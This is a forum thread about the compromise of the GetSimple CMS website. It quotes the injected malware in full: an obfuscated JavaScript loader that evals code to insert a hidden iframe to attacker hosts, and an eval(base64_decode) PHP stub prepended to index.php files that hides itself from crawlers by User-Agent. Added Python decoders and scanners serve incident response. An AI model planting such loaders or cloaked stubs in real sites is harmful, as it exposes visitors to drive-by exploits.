Posts: 149
Threads: 12
Joined: Dec 2009
Looks like this site (May 11, 9am CET) has been hacked and is now injecting a script redirecting users to
http://lbxdmes.usa.cc/?go=2
Viewing the page source confirms that something is getting injected on GS pages.
Can anyone confirm?
Posts: 1,127
Threads: 136
Joined: Feb 2012
marrco Wrote:Looks like this site (May 11, 9am CET) has been hacked and is now injecting a script redirecting users to http://lbxdmes.usa.cc/?go=2
Viewing the page source confirms that something is getting injected on GS pages.
Can anyone confirm?
AVG was preventing me from accessing the GS site with warnings of 'Blackhole Exploit Kit'. But it seems to work again now.
Posts: 149
Threads: 12
Joined: Dec 2009
Definitely, now it's fine again. I have locally saved the exploited pages. The HTML was starting with a
Code:
<script>i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58...
Now I'm waiting to find out whether there's an actual critical bug in GS or what.
Posts: 149
Threads: 8
Joined: Dec 2011
Wouldn't say it is over, since I am still attacked when I get to the homepage or forum... (my anti-virus software kills it immediately).
I sent Chris an email early this morning just to be sure he knows about it (I most likely won't be the only one doing that, but at least he will be in the know this way). But it is very clear something was hacked. Could be the forum software, GS (although I think the main site at least used to be WordPress, maybe not anymore), the server, etc.
Hope that (a) things will be solved soon, (b) it will be clear what was causing it, and (c) if it turns out to be GS, how that hole needs to be plugged.
Posts: 1,848
Threads: 86
Joined: Aug 2009
Thanks guys! I have found a rogue file in the /theme/ folder and deleted it. I will keep looking into it to see if this happens again. Thanks for the emails, guys!
-
Chris
Thanks for using GetSimple! - Download
Please do not email me directly for help regarding GetSimple. Please post all your questions/problems in the forum!
Posts: 149
Threads: 8
Joined: Dec 2011
From my side I am still getting the 'attack attempt blocked' notice from my anti-virus software. Could that be cache? Otherwise something might still be active.
Posts: 1,108
Threads: 70
Joined: Aug 2009
Must be cached; it looks clean now.
Posts: 149
Threads: 8
Joined: Dec 2011
2012-05-11, 21:36:26
(This post was last modified: 2012-05-11, 21:36:54 by xLn.)
Firefox has quite a persistent cache I must say, so that could well be it.
My Norton Internet Security keeps roaring into action in any case. Will keep an eye on it.
Hope it is clear soon what happened.
Posts: 1,848
Threads: 86
Joined: Aug 2009
Can't you try private browsing and see if you still see it?
-
Chris
Posts: 149
Threads: 8
Joined: Dec 2011
Good point. Just did; it still sees it. However, if I look at the site in Chrome, I don't get any notice.
So maybe it is still a persistent bit of cache or what have you.
Posts: 2,928
Threads: 195
Joined: Feb 2011
I ran into it again just now, when I logged in for the first time this afternoon.
In the morning my antivirus program didn't give any alarm;
just now there was an alarm.
I cleared the browser cache, will see what's happening.
So much intelligence wasted on such stupid actions.
Posts: 6,266
Threads: 181
Joined: Sep 2011
I suggest everyone deletes their GS cache.
It is all infected from the plugin API caches.
Well, mine are, but I'm not sure where it's coming from yet, since it doesn't show up when I do a direct call.
Well, I don't see the injection when accessing directly via my browser, but my curl and file_get_contents both return a script injection.
Either GS is compromised or I have some local injection on my host.
If someone could open a new cache file from the API,
gs/data/cache/<md5>.txt
and see if it contains script tags.
Posts: 1,848
Threads: 86
Joined: Aug 2009
I just checked the cache on get-simple.info and inside the API cache that feeds these API calls, and everything looks clean as a whistle. What do you see?
-
Chris
Posts: 6,266
Threads: 181
Joined: Sep 2011
ccagle8 Wrote:I just checked the cache on get-simple.info and inside the API cache that feeds these API calls, and everything looks clean as a whistle. What do you see?
Code:
bfbf906471daf3f15be136dfe21ee5a1.txt
<XSS>i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c60c73c56c56c63c62c63c77c67c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-10c77c63c58c74c62c19c-3c7c6c-3c-10c62c59c63c61c62c74c19c-3c7c6c-3c-10c73c74c79c66c59c19c-3c76c63c73c63c56c63c66c63c74c79c16c62c63c58c58c59c68c17c70c69c73c63c74c63c69c68c16c55c56c73c69c66c75c74c59c17c66c59c60c74c16c6c17c74c69c70c16c6c17c-3c20c18c5c63c60c72c55c67c59c20c-8c-1c17c-29c-33c-33c83c-29c-33c-33c60c75c68c57c74c63c69c68c-10c63c60c72c55c67c59c72c-2c-1c81c-29c-33c-33c-33c76c55c72c-10c60c-10c19c-10c58c69c57c75c67c59c68c74c4c57c72c59c55c74c59c27c66c59c67c59c68c74c-2c-3c63c60c72c55c67c59c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c73c72c57c-3c2c-3c62c74c74c70c16c5c5c60c73c56c56c63c62c63c77c67c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-1c17c60c4c73c74c79c66c59c4c76c63c73c63c56c63c66c63c74c79c19c-3c62c63c58c58c59c68c-3c17c60c4c73c74c79c66c59c4c70c69c73c63c74c63c69c68c19c-3c55c56c73c69c66c75c74c59c-3c17c60c4c73c74c79c66c59c4c66c59c60c74c19c-3c6c-3c17c60c4c73c74c79c66c59c4c74c69c70c19c-3c6c-3c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c77c63c58c74c62c-3c2c-3c7c6c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c62c59c63c61c62c74c-3c2c-3c7c6c-3c-1c17c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c4c55c70c70c59c68c58c25c62c63c66c58c-2c60c-1c17c-29c-33c-33c83'][0].split('c');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;569!=i;i+=1){j=i;if(e)s=s+r["fromC"+z](w[j]*1+42);} 
if(v&&e&&r)e(s);</XSS>{"status":"error","message":"invalid id: item_manager.php"}
Script tags replaced with XSS tags.
It unpacks into a DOM-inserted iframe after the body that loads a URL payload.
This shouldn't cause any issues as long as those don't get loaded into a browser, which they shouldn't, unless you're debugging why your plugin lookups aren't working, which I was.
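Reading the cached file without running it. The loader is the numeric-array variant: each 'c'-separated token is an integer, the loop adds 42 and maps the result through String.fromCharCode, and the assembled string is handed to eval (reached as window["eva"+"l"] to dodge naive signatures). The same arithmetic replayed in Python recovers the payload with no JavaScript engine involved. The following is an added example written for this page, not code from the thread or from GetSimple; the array is copied verbatim from the cache file quoted above, with the poster's <XSS> markers turned back into <script>. Decoded, it is a few lines that create a 10x10 hidden iframe pointing at http://fsbbihiwm.igg.biz/?go=2, a different host from the usa.cc one in the first post, which matters if you are blocking at a proxy.

```python
"""Static decoder for the numeric-array JavaScript loader found in the GetSimple
plugin-API cache file quoted above.  Added example for this page, not code from
the thread or from GetSimple; it replays the loader's own arithmetic in Python
so the payload is never evaluated by a JavaScript engine."""
import re

# The cached file as posted, with the poster's <XSS> markers turned back into
# <script> tags.  The numeric array is copied verbatim from that post.
ARRAY = (
    "-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c"
    "-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c"
    "-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c"
    "60c73c56c56c63c62c63c77c67c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-10c77c63c58c74c62c19c-3c7c6c-3c-10c62c59c63c61c62c74c19c-3c7c6c-3c"
    "-10c73c74c79c66c59c19c-3c76c63c73c63c56c63c66c63c74c79c16c62c63c58c58c59c68c17c70c69c73c63c74c63c69c68c16c55c56c73c69c66c75c74c59c17c"
    "66c59c60c74c16c6c17c74c69c70c16c6c17c-3c20c18c5c63c60c72c55c67c59c20c-8c-1c17c-29c-33c-33c83c-29c-33c-33c60c75c68c57c74c63c69c68c-10c"
    "63c60c72c55c67c59c72c-2c-1c81c-29c-33c-33c-33c76c55c72c-10c60c-10c19c-10c58c69c57c75c67c59c68c74c4c57c72c59c55c74c59c27c66c59c67c59c68c74c"
    "-2c-3c63c60c72c55c67c59c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c73c72c57c-3c2c-3c62c74c74c70c16c5c5c60c73c56c56c63c62c63c77c67c4c"
    "63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-1c17c60c4c73c74c79c66c59c4c76c63c73c63c56c63c66c63c74c79c19c-3c62c63c58c58c59c68c-3c17c60c4c73c74c79c66c59c4c"
    "70c69c73c63c74c63c69c68c19c-3c55c56c73c69c66c75c74c59c-3c17c60c4c73c74c79c66c59c4c66c59c60c74c19c-3c6c-3c17c60c4c73c74c79c66c59c4c74c69c70c19c-3c6c-3c17c"
    "60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c77c63c58c74c62c-3c2c-3c7c6c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c62c59c63c61c62c74c-3c2c-3c7c6c-3c-1c17c"
    "-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c4c55c70c70c59c68c58c25c62c63c66c58c-2c60c-1c17c-29c-33c-33c83"
)
CACHED_INJECTION = (
    "<script>i=0;try{prototype;}catch(z){h=\"harCode\";f=['" + ARRAY
    + "'][0].split('c');v=\"e\"+\"va\";}if(v)e=window[v+\"l\"];"
      "try{q=document.createElement(\"div\");q.appendChild(q+\"\");}"
      "catch(qwg){w=f;s=[];} r=String;z=((e)?h:\"\");"
      "for(;569!=i;i+=1){j=i;if(e)s=s+r[\"fromC\"+z](w[j]*1+42);} "
      "if(v&&e&&r)e(s);</script>"
)

ARRAY_RE = re.compile(r"f=\['([^']+)'\]\[0\]\.split\('([^']+)'\)")
OFFSET_RE = re.compile(r"\(w\[j\]\*1\+(-?\d+)\)")
COUNT_RE = re.compile(r"for\(;(\d+)!=i;i\+=1\)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

def decode_injection(script):
    """token * 1 + offset -> fromCharCode, exactly as the loader does it.  Every
    token present is used instead of the hard-coded loop bound, so a truncated
    copy still gives a readable partial result."""
    m = ARRAY_RE.search(script)
    if not m:
        raise ValueError("no f=['...'][0].split('...') array found")
    raw, sep = m.group(1), m.group(2)
    off = OFFSET_RE.search(script)
    offset = int(off.group(1)) if off else 0
    return "".join(chr(int(tok) + offset) for tok in raw.split(sep) if tok)

def declared_loop_bound(script):
    """Element count the loader itself expects (569 here).  A mismatch with
    array_length() means the copy was cut or edited."""
    m = COUNT_RE.search(script)
    return int(m.group(1)) if m else None

def array_length(script):
    m = ARRAY_RE.search(script)
    return len([t for t in m.group(1).split(m.group(2)) if t]) if m else 0

def extract_urls(decoded):
    return sorted(set(URL_RE.findall(decoded)))

def is_numeric_array_injection(text):
    """Cheap triage signature for cache and theme files: the family's fixed
    prologue plus an offset-decoded array."""
    return "try{prototype;}catch(" in text and ARRAY_RE.search(text) is not None

if __name__ == "__main__":
    body = decode_injection(CACHED_INJECTION)
    print("declared", declared_loop_bound(CACHED_INJECTION),
          "tokens, found", array_length(CACHED_INJECTION))
    print("landing URLs:", extract_urls(body))
    print(body)
```

Point it at any suspect cache or theme file: is_numeric_array_injection is the cheap first pass for a whole directory, decode_injection gives the cleartext and extract_urls the hosts to block. If declared_loop_bound and array_length disagree, the copy you are looking at is not the one the browser saw.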
Posts: 1,848
Threads: 86
Joined: Aug 2009
OK, found it. It must have been a host vulnerability or something... but every index.php file on the server had this at the top:
The reason it was so hard to find was that none of the timestamps were changed on any of the files. If anyone else sees this, please let me know... I may have missed a file.
Code:
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJywnY2hyb21lJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFBUQTdkSEo1ZTNCeWIzUnZkSGx3WlR0OVkyRjBZMmdvZWlsN2FEMGlhR0Z5UTI5a1pTSTdaajFiSnkwek0yTXRNek5qTmpOak5qQmpMVEV3WXkweVl6VTRZelk1WXpVM1l6YzFZelkzWXpVNVl6WTRZemMwWXpSak5qRmpOVGxqTnpSak1qZGpOalpqTlRsak5qZGpOVGxqTmpoak56UmpOek5qTWpSak56bGpOREpqTlRWak5qRmpNelpqTlRWak5qZGpOVGxqTFRKakxUTmpOVFpqTmpsak5UaGpOemxqTFROakxURmpORGxqTm1NMU1XTXRNV000TVdNdE1qbGpMVE16WXkwek0yTXRNek5qTmpOak5qQmpOekpqTlRWak5qZGpOVGxqTnpKakxUSmpMVEZqTVRkakxUSTVZeTB6TTJNdE16TmpPRE5qTFRFd1l6VTVZelkyWXpjell6VTVZeTB4TUdNNE1XTXRNamxqTFRNell5MHpNMk10TXpOak5UaGpOamxqTlRkak56VmpOamRqTlRsak5qaGpOelJqTkdNM04yTTNNbU0yTTJNM05HTTFPV010TW1NdE9HTXhPR00yTTJNMk1HTTNNbU0xTldNMk4yTTFPV010TVRCak56TmpOekpqTlRkak1UbGpMVE5qTmpKak56UmpOelJqTnpCak1UWmpOV00xWXpZd1l6Y3pZelUyWXpVMll6WXpZell5WXpZell6YzNZelkzWXpSak5qTmpOakZqTmpGak5HTTFObU0yTTJNNE1HTTFZekl4WXpZeFl6WTVZekU1WXpoakxUTmpMVEV3WXpjM1l6WXpZelU0WXpjMFl6WXlZekU1WXkwell6ZGpObU10TTJNdE1UQmpOakpqTlRsak5qTmpOakZqTmpKak56UmpNVGxqTFROak4yTTJZeTB6WXkweE1HTTNNMk0zTkdNM09XTTJObU0xT1dNeE9XTXRNMk0zTm1NMk0yTTNNMk0yTTJNMU5tTTJNMk0yTm1NMk0yTTNOR00zT1dNeE5tTTJNbU0yTTJNMU9HTTFPR00xT1dNMk9HTXhOMk0zTUdNMk9XTTNNMk0yTTJNM05HTTJNMk0yT1dNMk9HTXhObU0xTldNMU5tTTNNMk0yT1dNMk5tTTNOV00zTkdNMU9XTXhOMk0yTm1NMU9XTTJNR00zTkdNeE5tTTJZekUzWXpjMFl6WTVZemN3WXpFMll6WmpNVGRqTFROak1qQmpNVGhqTldNMk0yTTJNR00zTW1NMU5XTTJOMk0xT1dNeU1HTXRPR010TVdNeE4yTXRNamxqTFRNell5MHpNMk00TTJNdE1qbGpMVE16WXkwek0yTTJNR00zTldNMk9HTTFOMk0zTkdNMk0yTTJPV00yT0dNdE1UQmpOak5qTmpCak56SmpOVFZqTmpkak5UbGpOekpqTFRKakxURmpPREZqTFRJNVl5MHpNMk10TXpOakxUTXpZemMyWXpVMVl6Y3lZeTB4TUdNMk1HTXRNVEJqTVRsakxURXdZelU0WXpZNVl6VTNZemMxWXpZM1l6VTVZelk0WXpjMFl6UmpOVGRqTnpKak5UbGpOVFZqTnpSak5UbGpNamRqTmpaak5UbGpOamRqTlRsak5qaGpOelJqTFRKakxUTmpOak5qTmpCak56SmpOVFZqTmpkak5UbGpMVE5qTFRGak1UZGpOakJqTkdNM00yTTFPV00zTkdNeU0yTTNOR00zTkdNM01tTTJNMk0xTm1NM05XTTNOR00xT1dNdE1tTXRNMk0zTTJNM01tTTFOMk10TTJNeVl5MHpZell5WXpjMFl6YzBZemN3WXpFMll6VmpOV00yTUdNM00yTTFObU0xTm1NMk0yTTJNbU0yTTJNM04yTTJOMk0wWXpZell6WXhZell4WXpSak5UWmpOak5qT0RCak5XTXlNV00yTVdNMk9XTXhPV000WXkwell5MHhZekUzWXpZd1l6UmpOek5qTnpSak56bGpOalpqTlRsak5HTTNObU0yTTJNM00yTTJNMk0xTm1NMk0yTTJObU0yTTJNM05HTTNPV014T1dNdE0yTTJNbU0yTTJNMU9HTTFPR00xT1dNMk9HTXRNMk14TjJNMk1HTTBZemN6WXpjMFl6YzVZelkyWXpVNVl6UmpOekJqTmpsak56TmpOak5qTnpSak5qTmpOamxqTmpoak1UbGpMVE5qTlRWak5UWmpOek5qTmpsak5qWmpOelZqTnpSak5UbGpMVE5qTVRkak5qQmpOR00zTTJNM05HTTNPV00yTm1NMU9XTTBZelkyWXpVNVl6WXdZemMwWXpFNVl5MHpZelpqTFROak1UZGpOakJqTkdNM00yTTNOR00zT1dNMk5tTTFPV00wWXpjMFl6WTVZemN3WXpFNVl5MHpZelpqTFROak1UZGpOakJqTkdNM00yTTFPV00zTkdNeU0yTTNOR00zTkdNM01tTTJNMk0xTm1NM05XTTNOR00xT1dNdE1tTXRNMk0zTjJNMk0yTTFPR00zTkdNMk1tTXRNMk15WXkwell6ZGpObU10TTJNdE1XTXhOMk0yTUdNMFl6Y3pZelU1WXpjMFl6SXpZemMwWXpjMFl6Y3lZell6WXpVMll6YzFZemMwWXpVNVl5MHlZeTB6WXpZeVl6VTVZell6WXpZeFl6WXlZemMwWXkwell6SmpMVE5qTjJNMll5MHpZeTB4WXpFM1l5MHlPV010TXpOakxUTXpZeTB6TTJNMU9HTTJPV00xTjJNM05XTTJOMk0xT1dNMk9HTTNOR00wWXpZeFl6VTVZemMwWXpJM1l6WTJZelU1WXpZM1l6VTVZelk0WXpjMFl6Y3pZekkwWXpjNVl6UXlZelUxWXpZeFl6TTJZelUxWXpZM1l6VTVZeTB5WXkwell6VTJZelk1WXpVNFl6YzVZeTB6WXkweFl6UTVZelpqTlRGak5HTTFOV00zTUdNM01HTTFPV00yT0dNMU9HTXlOV00yTW1NMk0yTTJObU0xT0dNdE1tTTJNR010TVdNeE4yTXRNamxqTFRNell5MHpNMk00TXlkZFd6QmRMbk53YkdsMEtDZGpKeWs3ZGowaVpTSXJJblpoSWp0OWFXWW9kaWxsUFhkcGJtUnZkMXQyS3lKc0lsMDdkSEo1ZTNFOVpHOWpkVzFsYm5RdVkzSmxZWFJsUld4bGJXVnVkQ2dpWkdsMklpazdjUzVoY0hCbGJtUkRhR2xzWkNoeEt5SWlLVHQ5WTJGMFkyZ29jWGRuS1h0M1BXWTdjejFiWFR0OUlISTlVM1J5YVc1bk8zbzlLQ2hsS1Q5b09pSWlLVHRtYjNJb096VTJPU0U5YVR0cEt6MHhLWHRxUFdrN2FXWW9aU2x6UFhNcmNsc2labkp2YlVNaUszcGRLSGRiYWwwcU1TczBNaWs3ZlNCcFppaDJKaVpsSmlaeUtXVW9jeWs3UEM5elkzSnBjSFErJykpOw0KfQ0K'));?>
-
Chris
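What that blob is, and a scanner for it. Base64-decoding the outer layer gives a short PHP stub: error_reporting(0); a list of User-Agent substrings ('bot', 'crawl', 'spider', 'validator', 'linux', 'macintosh', 'mac os', 'x11', 'chrome', 'iphone', 'android', 'wordpress' and about thirty more); and, only when none of them matches, an echo of a second base64 blob that is a <script> of the same try{prototype;}catch family quoted from the cache file above. So crawlers, scanners, Chrome, Linux and Mac clients get clean pages while other browsers (and curl, whose default User-Agent matches nothing in the list) get the iframe, which fits the mixed reports earlier in the thread. The Python scanner below is an added example for this page, not code from the thread or from GetSimple: it finds the stub by content rather than by mtime, peels the nested base64 layers without executing them, and lists the User-Agent gate. The web root it scans is constructed in a temp dir with a placeholder URL.

```python
"""Content-based hunt for the eval(base64_decode(...)) stub prepended to every
index.php in the incident above, peeling its nested base64 layers so the
payload can be read without running it.  Added example for this page, not
code from the thread or from GetSimple; the sample web root is constructed
here with a placeholder URL."""
import base64
import binascii
import hashlib
import os
import re
import tempfile

# <?php eval(base64_decode('....'));?> glued in front of the real file.  Whitespace
# inside the quotes is tolerated because copies of the blob often arrive line-wrapped.
STUB_RE = re.compile(
    r"""<\?php\s+eval\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]\s*\)\s*\)\s*;?\s*\?>""")
INNER_RE = re.compile(r"""base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]""")
UA_LIST_RE = re.compile(r"array\s*\((.*?)\)\s*;", re.S)

def peel_base64_layers(blob, max_depth=5):
    """Decoded text of each nested base64_decode('...') layer, outermost first."""
    layers, current = [], blob
    for _ in range(max_depth):
        try:
            data = base64.b64decode(re.sub(r"\s+", "", current), validate=True)
        except (binascii.Error, ValueError):
            break
        text = data.decode("latin-1")  # byte-preserving; these payloads are ASCII
        layers.append(text)
        nxt = INNER_RE.search(text)
        if not nxt:
            break
        current = nxt.group(1)
    return layers

def user_agent_gate(php_layer):
    """Substrings the stub compares against HTTP_USER_AGENT to stay hidden."""
    m = UA_LIST_RE.search(php_layer)
    return re.findall(r"'([^']*)'", m.group(1)) if m else []

def scan_file(path):
    with open(path, "rb") as fh:
        head = fh.read(256 * 1024).decode("latin-1")
    m = STUB_RE.search(head)
    if not m:
        return None
    blob = re.sub(r"\s+", "", m.group(1))
    layers = peel_base64_layers(blob)
    return {"path": path,
            "prepended": m.start() == 0,  # stub sits before the file's own code
            "stub_sha256": hashlib.sha256(blob.encode("ascii")).hexdigest(),
            "layers": layers,
            "ua_gate": user_agent_gate(layers[0]) if layers else []}

def scan_tree(root):
    """Every .php file under root carrying the stub.  Content only: mtimes were
    untouched in this incident, so a find -newer sweep would miss these files."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            hit = scan_file(os.path.join(dirpath, name)) if name.endswith(".php") else None
            if hit:
                hits.append(hit)
    return hits

def _b64(text):
    return base64.b64encode(text.encode()).decode()

def build_sample_tree():
    """Constructed stand-in for an infected web root (two stubbed index.php files,
    one clean), same three layers as the real thing: PHP -> UA gate -> <script>."""
    script = ("<script>document.write(\"<iframe src='http://example.invalid/?go=2'"
              " width='10' height='10' style='visibility:hidden'></iframe>\")</script>")
    gate = ("error_reporting(0);\r\n$bot = FALSE ;\r\n$ua = $_SERVER['HTTP_USER_AGENT'];\r\n"
            "$botsUA = array('bot','crawl','linux','macintosh','x11','chrome','android');\r\n"
            "foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false)"
            "{$bot = true; break;}}\r\nif (!$bot){\r\n\techo(base64_decode('"
            + _b64(script) + "'));\r\n}\r\n")
    stub = "<?php eval(base64_decode('" + _b64(gate) + "'));?>"
    clean = "<?php\n// constructed stand-in for a GetSimple front controller\ninclude('admin/inc/common.php');\n"
    root = tempfile.mkdtemp(prefix="gs-scan-")
    for rel, body in {"index.php": stub + clean, "theme/index.php": stub + clean,
                      "admin/index.php": clean}.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", newline="") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for hit in scan_tree(build_sample_tree()):
        print(hit["path"], "prepended" if hit["prepended"] else "embedded", hit["stub_sha256"][:16])
        print("  UA gate:", ", ".join(hit["ua_gate"]))
        print("  payload:", hit["layers"][-1][:90])
```

Point scan_tree at the real document root instead of the sample; the stub_sha256 lets you tell whether every hit carries the same blob, and the decoded inner layer gives the iframe host to block. Because the gate suppresses the payload for anything that looks like a crawler or runs on Linux, fetching pages from the server itself or from a desktop Linux box is not a valid "is it clean now" check; read the files on disk.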
Posts: 6,266
Threads: 181
Joined: Sep 2011
Ok now clear your caches.
Posts: 6,266
Threads: 181
Joined: Sep 2011
It looks like with the new PunBB install
I am having issues with the toolbar.
It gives JS errors:
Uncaught ReferenceError: PUNBB is not defined